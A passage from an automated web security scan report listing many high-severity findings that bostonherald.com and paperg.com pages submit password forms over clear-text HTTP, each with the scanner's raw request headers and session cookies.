Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.35. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

The form contains the following password fields:

password
confirm_password

Request

GET /news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.36. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

The form contains the following password fields:

password
confirm_password

Request

GET /news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.37. http://www.bostonherald.com/news/regional/view.bg previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view.bg

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active

The form contains the following password fields:

password
confirm_password

Request

GET /news/regional/view.bg?articleid=1312541&format=comments&srvc=home&position=active HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.38. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.39. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

The form contains the following password fields:

password
confirm_password

Request

GET /news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.40. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.41. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

The form contains the following password fields:

password
confirm_password

Request

GET /sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.42. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.43. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.44. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.45. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

The form contains the following password fields:

password
confirm_password

Request

GET /track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.46. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

The form contains the following password fields:

password
confirm_password

Request

GET /track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3 HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.47. http://www.bostonherald.com/users/register previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/users/register

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/users/register/

The form contains the following password fields:

password
confirm_password

Request

GET /users/register HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.48. http://www.bostonherald.com/users/register/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/users/register/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.bostonherald.com/users/register/

The form contains the following password fields:

password
confirm_password

Request

GET /users/register/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

6.49. http://www.paperg.com/ previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.paperg.com
Path:	/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

http://www.paperg.com/

The form contains the following password field:

pass

Request

GET / HTTP/1.1
Host: www.paperg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=7vd5ghvii8jml9e7v9p6kn1gt1;

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:17:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny6
Vary: Accept-Encoding
Content-Type: text/html
Connection: close
Via: 1.1 AN-0016020122637050
Content-Length: 10755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<fieldset id="fb_login_field">
    <form id="form_login" action="" method="post">
